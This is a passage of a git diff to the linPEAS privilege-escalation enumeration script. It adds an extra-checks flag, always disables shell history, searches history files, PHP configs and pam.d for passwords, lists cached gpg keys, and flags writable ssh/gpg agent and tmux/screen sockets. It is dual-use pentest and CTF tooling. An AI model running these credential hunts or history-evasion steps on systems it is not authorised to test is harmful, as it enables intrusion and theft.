-perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" fi + echo "" ##-- IF) Hashes in passwd file @@ -534,6 +541,11 @@ if ! [ "$IAMROOT" ]; then echo "" fi +##-- IF) Passwords in history files +print_2title "Searching passwords in history files" +printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done +echo "" + ##-- IF) Passwords in config PHP files print_2title "Searching passwords in config PHP files" printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done diff --git a/linPEAS/builder/linpeas_parts/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh index df6fc85..357adad 100755 --- a/linPEAS/builder/linpeas_parts/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -52,7 +52,6 @@ ITALIC="${C}[3m" if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi FAST="1" #By default stealth/fast mode SUPERFAST="" -NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" @@ -60,8 +59,9 @@ CHECKS="peass{CHECKS}" WAIT="" PASSWORD="" NOCOLOR="" -VERBOSE="" +DEBUG="" AUTO_NETWORK_SCAN="" +EXTRA_CHECKS="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 @@ -70,12 +70,12 @@ HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${YELLOW}-h${BLUE} To show this message ${YELLOW}-q${BLUE} Do not show banner - ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-e${BLUE} Perform extra enumeration ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode - ${YELLOW}-w${BLUE} Wait execution between big blocks - ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-w${BLUE} Wait execution between big blocks of checks ${YELLOW}-N${BLUE} Do not use colours - ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-D${BLUE} Debug mode ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' ${YELLOW}-o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. @@ -86,12 +86,11 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-t${BLUE} Automatic network scan (host discovery and port scanning) - This option writes to files $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do +while getopts "h?asd:p:i:P:qo:LMwNDte" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; - a) FAST="";; + a) FAST="";EXTRA_CHECKS="1";; s) SUPERFAST=1;; - n) NOTEXPORT=1;; d) DISCOVERY=$OPTARG;; p) PORTS=$OPTARG;; i) IP=$OPTARG;; @@ -102,8 +101,9 @@ while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do M) MACPEAS="1";; w) WAIT=1;; N) NOCOLOR="1";; - v) VERBOSE="1";; + D) DEBUG="1";; t) AUTO_NETWORK_SCAN="1";; + e) EXTRA_CHECKS="1";; esac done @@ -510,7 +510,7 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh| knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" @@ -584,7 +584,7 @@ echo_no (){ } print_title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -605,7 +605,7 @@ print_title(){ } print_2title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -864,139 +864,12 @@ discovery_port_scan (){ #---) Exporting history env variables (---# ########################################### -if ! [ "$NOTEXPORT" ]; then - unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH - export HISTFILE=/dev/null - export HISTSIZE=0 - export HISTFILESIZE=0 -fi +unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH +export HISTFILE=/dev/null +export HISTSIZE=0 +export HISTFILESIZE=0 -########################################### -#---------) Container functions (---------# -########################################### - -containerCheck() { - inContainer="" - containerType="$(echo_no)" - - # Are we inside docker? - if [ -f "/.dockerenv" ] || - grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || - grep -qai docker /proc/self/cgroup 2>/dev/null || - [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then - - inContainer="1" - containerType="docker\n" - fi - - # Are we inside kubenetes? - if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || - grep -qai kubepods /proc/self/cgroup 2>/dev/null; then - - inContainer="1" - if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n" - else containerType="kubernetes\n" - fi - fi - - # Are we inside LXC? - if env | grep "container=lxc" -qa 2>/dev/null || - grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then - - inContainer="1" - containerType="lxc\n" - fi - - # Are we inside podman? - if env | grep -qa "container=podman" 2>/dev/null || - grep -qa "container=podman" /proc/1/environ 2>/dev/null; then - - inContainer="1" - containerType="podman\n" - fi - - # Check for other container platforms that report themselves in PID 1 env - if [ -z "$inContainer" ]; then - if grep -a 'container=' /proc/1/environ 2>/dev/null; then - inContainer="1" - containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n" - fi - fi -} - -inDockerGroup() { - DOCKER_GROUP="No" - if groups 2>/dev/null | grep -q '\bdocker\b'; then - DOCKER_GROUP="Yes" - fi -} - -checkDockerRootless() { - DOCKER_ROOTLESS="No" - if docker info 2>/dev/null|grep -q rootless; then - DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" - fi -} - -enumerateDockerSockets() { - dockerVersion="$(echo_not_found)" - if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then - SEARCHED_DOCKER_SOCKETS="1" - for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then - echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" - echo "Docker enummeration:" - docker_enumerated="" - - if [ "$(command -v curl)" ]; then - sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) - echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi - fi - - if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then - sockInfoResponse="$(docker info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) - printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - fi - - else - echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" - fi - done - fi -} - -checkDockerVersionExploits() { - if echo "$dockerVersion" | grep -iq "not found"; then - VULN_CVE_2019_13139="$(echo_not_found)" - VULN_CVE_2019_5736="$(echo_not_found)" - return - fi - - VULN_CVE_2019_13139="$(echo_no)" - if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then - VULN_CVE_2019_13139="Yes" - fi - - VULN_CVE_2019_5736="$(echo_no)" - if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then - VULN_CVE_2019_5736="Yes" - fi -} - -checkContainerExploits() { - VULN_CVE_2019_5021="$(echo_no)" - if [ -f "/etc/alpine-release" ]; then - alpineVersion=$(cat /etc/alpine-release) - if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then - VULN_CVE_2019_5021="Yes" - fi - fi -} - ########################################### #-----------) Some Basic Info (-----------# diff --git a/linPEAS/builder/linpeas_parts/network_information.sh b/linPEAS/builder/linpeas_parts/network_information.sh index 92ebef1..c6255c8 100644 --- a/linPEAS/builder/linpeas_parts/network_information.sh +++ b/linPEAS/builder/linpeas_parts/network_information.sh @@ -15,9 +15,11 @@ warn_exec dnsdomainname 2>/dev/null echo "" #-- NI) /etc/inetd.conf -print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" -(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" -echo "" +if [ "$EXTRA_CHECKS" ]; then + print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" + (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + echo "" +fi #-- NI) Interfaces print_2title "Interfaces" @@ -26,14 +28,16 @@ cat /etc/networks 2>/dev/null echo "" #-- NI) Neighbours -print_2title "Networks and neighbours" -if [ "$MACOS" ]; then - netstat -rn 2>/dev/null -else - (route || ip n || cat /proc/net/route) 2>/dev/null +if [ "$EXTRA_CHECKS" ]; then + print_2title "Networks and neighbours" + if [ "$MACOS" ]; then + netstat -rn 2>/dev/null + else + (route || ip n || cat /proc/net/route) 2>/dev/null + fi + (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null + echo "" fi -(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null -echo "" if [ "$MACPEAS" ]; then print_2title "Firewall status" @@ -41,9 +45,11 @@ if [ "$MACPEAS" ]; then fi #-- NI) Iptables -print_2title "Iptables rules" -(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" -echo "" +if [ "$EXTRA_CHECKS" ]; then + print_2title "Iptables rules" + (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" + echo "" +fi #-- NI) Ports print_2title "Active Ports" @@ -52,7 +58,7 @@ print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-por echo "" #-- NI) MacOS hardware ports -if [ "$MACPEAS" ]; then +if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then print_2title "Hardware Ports" networksetup -listallhardwareports echo "" @@ -93,7 +99,7 @@ fi echo "" #-- NI) Internet access -if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then +if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then print_2title "Internet Access?" check_tcp_80 2>/dev/null & check_tcp_443 2>/dev/null & @@ -111,7 +117,7 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then else print_2title "Scanning local networks (using /24)" - if ! [ "$PING" ] && ![ "$FPING" ]; then + if ! [ "$PING" ] && ! [ "$FPING" ]; then printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" fi @@ -162,15 +168,17 @@ if [ "$MACOS" ]; then system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," echo "" - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" + if [ "$EXTRA_CHECKS" ]; then + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType + echo "" - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType + echo "" - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" + fi fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh index 0a9a4e3..ec04292 100644 --- a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh +++ b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh @@ -122,10 +122,12 @@ if [ "$MACPEAS" ]; then fi #-- PCS) Services -print_2title "Services" -print_info "Search for outdated versions" -(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" -echo "" +if [ "$EXTRA_CHECKS" ]; then + print_2title "Services" + print_info "Search for outdated versions" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + echo "" +fi #-- PSC) systemd PATH print_2title "Systemd PATH" @@ -138,13 +140,13 @@ echo "" #TODO: .service files in MACOS are folders print_2title "Analyzing .service files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" -printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do if [ ! -O "$s" ]; then #Remove services that belongs to the current user if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do + printf "%s\n" "$servicebinpaths" | while read sp; do if [ -w "$sp" ]; then echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi @@ -172,7 +174,7 @@ echo "" #-- PSC) .timer files print_2title "Analyzing .timer files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" -printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +printf "%s\n" "$PSTORAGE_TIMER" | while read t; do if ! [ "$IAMROOT" ] && [ -w "$t" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi diff --git a/linPEAS/builder/linpeas_parts/software_information.sh b/linPEAS/builder/linpeas_parts/software_information.sh index 49436fd..c0d7f48 100644 --- a/linPEAS/builder/linpeas_parts/software_information.sh +++ b/linPEAS/builder/linpeas_parts/software_information.sh @@ -129,14 +129,7 @@ peass{Rsync} peass{Hostapd} -#-- SI) Wifi conns -print_2title "Searching wifi conns file" -wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) -if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done -else echo_not_found -fi -echo "" +peass{Wifi Connections} peass{Anaconda ks} @@ -152,6 +145,7 @@ if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CER sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +writable_agents=$(find $folder_path -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')') peass{SSH} @@ -197,6 +191,15 @@ if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then ssh-add -l echo "" fi +if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then + print_3title "Listing gpg keys cached in gpg-agent" + gpg-connect-agent "keyinfo --list" /bye + echo "" +fi +if [ "$writable_agents" ]; then + print_3title "Writable ssh and gpg agents" + printf "%s\n" "$writable_agents" +fi if [ "$PSTORAGE_SSH_CONFIG" ]; then print_3title "Some home ssh config file was found" printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done @@ -221,22 +224,14 @@ if [ "$sshconfig" ]; then fi echo "" -#-- SI) PAM auth -print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" -pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) -if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," -else echo_no -fi +peass{PAM Auth} + +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" -#-- SI) NFS exports -print_2title "NFS exports?" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" -if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," -else echo_not_found "/etc/exports" -fi -echo "" +peass{NFS Exports} #-- SI) Kerberos print_2title "Searching kerberos conf files and tickets" @@ -335,21 +330,34 @@ echo "" print_2title "Searching screen sessions" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" screensess=$(screen -ls 2>/dev/null) -if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," -else echo_not_found "screen" +screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) +if [ "$screensess" ] || [ "$screensess2" ]; then + screen -v + printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," +else + echo_not_found "screen" fi +find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," +done echo "" #-- SI) Tmux sessions tmuxdefsess=$(tmux ls 2>/dev/null) tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) print_2title "Searching tmux sessions"$N print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" -if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," -else echo_not_found "tmux" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ]; then + tmux -V + printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else + echo_not_found "tmux" fi + +find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," +done echo "" peass{CouchDB} @@ -410,7 +418,7 @@ echo "" print_2title "Analyzing kcpassword files" print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" -printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do +printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do echo "$f" | sed -${E} "s,.*,${SED_RED}," base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," done @@ -521,12 +529,6 @@ if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; th fi echo "" -#-- SI) Passwords inside pam.d -print_2title "Passwords inside pam.d" -grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," -echo "" - - peass{SNMP} diff --git a/linPEAS/builder/linpeas_parts/system_information.sh b/linPEAS/builder/linpeas_parts/system_information.sh index 4967d6a..7f6ea6d 100644 --- a/linPEAS/builder/linpeas_parts/system_information.sh +++ b/linPEAS/builder/linpeas_parts/system_information.sh @@ -54,15 +54,19 @@ warn_exec uptime 2>/dev/null echo "" #-- SY) System stats -print_2title "System stats" -(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" -warn_exec free 2>/dev/null -echo "" +if [ "$EXTRA_CHECKS" ]; then + print_2title "System stats" + (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" + warn_exec free 2>/dev/null + echo "" +fi #-- SY) CPU info -print_2title "CPU info" -warn_exec lscpu 2>/dev/null -echo "" +if [ "$EXTRA_CHECKS" ]; then + print_2title "CPU info" + warn_exec lscpu 2>/dev/null + echo "" +fi #-- SY) Environment vars print_2title "Environment" @@ -91,6 +95,9 @@ if [ "$(command -v bash 2>/dev/null)" ]; then print_info "https://github.com/mzet-/linux-exploit-suggester" les_b64="peass{LES}" echo $les_b64 | base64 -d | bash + if [ "$EXTRA_CHECKS" ]; then + echo $les_b64 | base64 -d | bash -s -- --checksec + fi echo "" fi diff --git a/linPEAS/builder/linpeas_parts/users_information.sh b/linPEAS/builder/linpeas_parts/users_information.sh index d0de135..2217adf 100644 --- a/linPEAS/builder/linpeas_parts/users_information.sh +++ b/linPEAS/builder/linpeas_parts/users_information.sh @@ -1,7 +1,6 @@ ########################################### #----------) Users Information (----------# ########################################### -print_title "Users Information" #-- UI) My user print_2title "My user" @@ -190,20 +189,22 @@ fi echo "" #-- UI) Password policy -print_2title "Password policy" -grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" -echo "" - -if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null +if [ "$EXTRA_CHECKS" ]; then + print_2title "Password policy" + grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" + if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null + echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + echo "" + fi fi #-- UI) Brute su diff --git a/linPEAS/builder/src/fileRecord.py b/linPEAS/builder/src/fileRecord.py index 3388faf..b06561a 100644 --- a/linPEAS/builder/src/fileRecord.py +++ b/linPEAS/builder/src/fileRecord.py @@ -4,6 +4,7 @@ class FileRecord: def __init__(self, regex: str, bad_regex: str=DEFAULTS["bad_regex"], + very_bad_regex: str=DEFAULTS["very_bad_regex"], check_extra_path: str =DEFAULTS["check_extra_path"], files: dict={}, good_regex: str=DEFAULTS["good_regex"], @@ -19,6 +20,7 @@ class FileRecord: self.regex = regex self.bad_regex = bad_regex + self.very_bad_regex = very_bad_regex self.check_extra_path = check_extra_path self.files = [FileRecord(regex=fr["name"],**fr["value"]) for fr in files] self.good_regex = good_regex diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 2139467..585a6e7 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -228,7 +228,7 @@ class LinpeasBuilder: analise_line = "" if init: - analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then echo_not_found "'+frecord.regex+'"; fi; ' + analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; ' analise_line += 'printf "%s" 